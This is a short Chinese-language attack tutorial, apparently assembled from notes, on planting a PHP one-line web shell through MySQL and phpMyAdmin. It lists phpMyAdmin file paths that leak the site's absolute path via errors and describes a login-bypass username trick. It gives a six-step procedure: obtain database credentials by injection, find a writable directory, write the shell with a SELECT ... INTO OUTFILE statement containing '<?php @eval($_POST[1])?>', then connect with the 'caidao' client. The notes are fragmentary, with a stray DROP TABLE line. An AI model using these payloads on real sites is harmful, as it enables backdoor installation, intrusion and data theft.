先介绍 MySQL导出一句话木马的语法(我个人比较喜欢说思路)
Drop TABLE IF EXISTS temp; //如果存在temp就删掉
(以上的意思大概看看就可以下面来碰运气)
利用方法:用户名处写入‘localhost’@'@”则登录成功。 (注意全部是英文标点符号,最后一个为英文双引号)
附上几个php爆绝对路径的办法: phpMyAdmin/libraries/select_lang.lib.php phpMyAdmin/darkblue_orange/layout.inc.php phpMyAdmin/index.php?lang[]=1 phpmyadmin/themes/darkblue_orange/layout.inc.php
利用mysql数据库爆网站绝对路径方法
使用phpmyadmin的某个文件报错
phpmyadmin爆路径方法 weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php
phpMyAdmin/libraries/select_lang.lib.php
1.首先通过注入获取mysql数据库的用户名和密码
2.通过相关渠道获取mysql数据库的路径
3.使用用户名和密码登陆mysql
4.获取网站可写目录的绝对路径
5.点击进入sql编辑器,输入上述代码,将一句话木马写入网站
6.使用菜刀连接一句话
使用phpmyadmin中的sql语句
写文件:
select '<?php @eval($_POST[1])?>' into outfile '/data/www/XXX/cp/log.php'
最后的/cp/log.php的文件名可以任意起的,不是固定的。
登录phpMyAdmin,写入一句话d:/wwwroot/1.php
|
|